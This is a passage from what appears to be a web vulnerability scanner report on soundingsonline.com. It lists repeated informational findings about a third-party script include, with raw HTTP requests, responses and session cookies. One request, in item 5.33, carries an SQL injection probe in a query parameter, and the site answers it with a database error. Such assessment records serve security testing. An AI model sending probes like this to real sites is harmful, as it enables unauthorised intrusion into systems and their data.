Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.31. http://www.soundingsonline.com/features/technical  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/technical HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.32. http://www.soundingsonline.com/features/type-of-boat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features/type-of-boat HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.33. http://www.soundingsonline.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:33:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:33:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.34. http://www.soundingsonline.com/more/digital-publications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/digital-publications

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /more/digital-publications HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.35. http://www.soundingsonline.com/more/the-masters-series  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /more/the-masters-series

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /more/the-masters-series HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:34:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:34:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.36. http://www.soundingsonline.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.37. http://www.soundingsonline.com/news/coastwise  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/coastwise

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/coastwise HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.38. http://www.soundingsonline.com/news/dispatches  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/dispatches

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/dispatches HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:30:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:30:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.39. http://www.soundingsonline.com/news/home-waters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/home-waters

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/home-waters HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.40. http://www.soundingsonline.com/news/mishaps-a-rescues  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/mishaps-a-rescues HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:27:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:27:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.41. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; __utmc=1; __utmb=1.1.10.1295961240; s_cc=true; s_visit=1; s_vnum=1298514239669%26vn%3D2; s_invisit=true; s_lv=1295961240451; s_lv_s=Less%20than%201%20day; s_sq=%5B%5BB%5D%5D; count=5

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 13:16:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 13:16:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.42. http://www.soundingsonline.com/news/sailing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/sailing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/sailing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.43. http://www.soundingsonline.com/news/todays-top-stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /news/todays-top-stories

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/todays-top-stories HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.44. http://www.soundingsonline.com/resources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /resources

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /resources HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.45. http://www.soundingsonline.com/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:36:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:36:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script>
...[SNIP]...

5.46. http://www.soundingsonline.com/subscription-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /subscription-services

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /subscription-services HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
